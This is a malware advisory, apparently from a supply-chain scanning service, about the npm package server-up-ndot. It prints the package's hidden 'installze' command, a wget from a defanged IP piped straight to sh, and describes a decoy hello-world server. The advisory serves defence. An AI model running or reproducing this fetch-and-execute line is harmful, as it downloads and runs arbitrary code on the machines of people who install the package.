LWA-2026-5100 confirmed malware
server-up-ndot@1.0.0
Malicious code in server-up-ndot (npm)
T1059.004 · Unix ShellT1105 · Ingress Tool Transfer
Analysis
Package ships a script named "installze" that executes wget -qO- 192[.]168[.]219[.]159:5000/js/app/1 | sh — downloading and running arbitrary code from the private IP 192[.]168[.]219[.]159 on port 5000. The main entry point index.js is a benign Express hello-world server acting as a decoy. The package also bundles a file (./package/1) that echoes "ndot" branding. The downloader is dormant under normal npm install (the script name is not a lifecycle hook), suggesting staged infrastructure.
- analyzed by
- Leitwacht
- first seen
- Jun 13, 2026, 05:47 PM
- analyzed
- Jun 13, 2026, 05:49 PM
Related advisories
- rtms-manager@1.2.0
- rtms-manager-dev@1.3.0
- request-logger-canary@1.0.0
- redux-probe-unknown-action-rce@1.0.0
- houzidawang806@1.0.1
- @wacrot/infra-data-kit@2.1.4
- prisma-callback@1.0.0
- poloman@9.2.1
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.